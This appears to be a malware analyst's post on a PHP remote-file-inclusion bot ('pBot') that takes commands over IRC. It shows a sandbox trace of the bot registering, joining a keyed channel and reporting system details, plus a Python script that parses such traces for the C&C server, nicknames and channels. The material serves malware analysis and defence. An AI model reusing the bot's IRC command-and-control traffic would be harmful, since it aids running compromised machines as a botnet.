I’m working on analyzing remote file inclusion (RFI) code. For the pBot class, which uses an IRC server for command and control (C&C), we are interested in getting the IP addresses of the C&C, the channel name and the nickname used to connect to the IRC server.
Below is a sample of the output:
ok!
(host=irc.server_name.net, port=6667, , , 30)
( 1160 , “USER inul07429 127.0.0.1 localhost :Linux phpsBox 2.6.24-24-server #1 SMP Fri Sep 18 17:24:10 UTC 2009 i686 ” , )
( 1160 , “NICK [E]inul92112 ” , )
( 1160 , “MODE [E]inul92112 +ps” , )
( 1160 , “JOIN #knk !anime” , )
( 1160 , “PRIVMSG #trouxanime :[uname!]: Linux phpsBox 2.6.24-24-server #1 SMP Fri Sep 18 17:24:10 UTC 2009 i686 (safe: off)” , )
( 1160 , “PRIVMSG #trouxanime :[vuln!]: http://” , )
( 1160 , “NICK [E]inul97869” , )
( 1160 , “PONG :1508829909” , )
( 1160 , “PONG :1508829909” , )
( 1160 , “PONG :1508829909” , )
( 1160 , “PONG :1508829909” , )
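One way to pull the C&C server, nicknames and channels out of a trace like the one above, as an added example that is not part of the original post. It assumes the trace format shown (a connect line followed by quoted socket writes); the function and field names are hypothetical, and the host is reported as logged, not resolved to an IP address.

```python
import re

# Lines copied from the trace above (USER and PRIVMSG text abridged, curly quotes kept).
SAMPLE = """\
(host=irc.server_name.net, port=6667, , , 30)
( 1160 , “USER inul07429 127.0.0.1 localhost :Linux phpsBox” , )
( 1160 , “NICK [E]inul92112 ” , )
( 1160 , “MODE [E]inul92112 +ps” , )
( 1160 , “JOIN #knk !anime” , )
( 1160 , “PRIVMSG #trouxanime :[vuln!]: http://” , )
( 1160 , “NICK [E]inul97869” , )
( 1160 , “PONG :1508829909” , )
"""

# Connect call: (host=..., port=..., ...)
CONNECT_RE = re.compile(r'\(\s*host=([^,\s]+)\s*,\s*port=(\d+)')
# Socket write: ( <handle> , "<irc line>" , ) with straight or curly quotes
WRITE_RE = re.compile(r'\(\s*\d+\s*,\s*[“"](.*?)[”"]\s*,\s*\)')

def extract_c2(trace):
    """Collect C&C endpoint, nicknames, joined channels and message targets."""
    info = {"servers": [], "user": None, "nicks": [], "joins": [], "msg_targets": []}
    for line in trace.splitlines():
        m = CONNECT_RE.search(line)
        if m:
            info["servers"].append((m.group(1), int(m.group(2))))
            continue
        m = WRITE_RE.search(line)
        if not m:
            continue
        # Drop the IRC trailing parameter (" :free text") before splitting.
        words = m.group(1).strip().partition(" :")[0].split()
        if len(words) < 2:
            continue
        cmd, args = words[0].upper(), words[1:]
        if cmd == "USER":
            info["user"] = args[0]
        elif cmd == "NICK" and args[0] not in info["nicks"]:
            info["nicks"].append(args[0])  # bots may re-nick, keep every value
        elif cmd == "JOIN":
            # IRC syntax: JOIN <chan>{,<chan>} [<key>{,<key>}]
            keys = args[1].split(",") if len(args) > 1 else []
            for i, chan in enumerate(args[0].split(",")):
                info["joins"].append((chan, keys[i] if i < len(keys) else None))
        elif cmd == "PRIVMSG" and args[0] not in info["msg_targets"]:
            info["msg_targets"].append(args[0])  # may differ from joined channel
    return info

if __name__ == "__main__":
    print(extract_c2(SAMPLE))
```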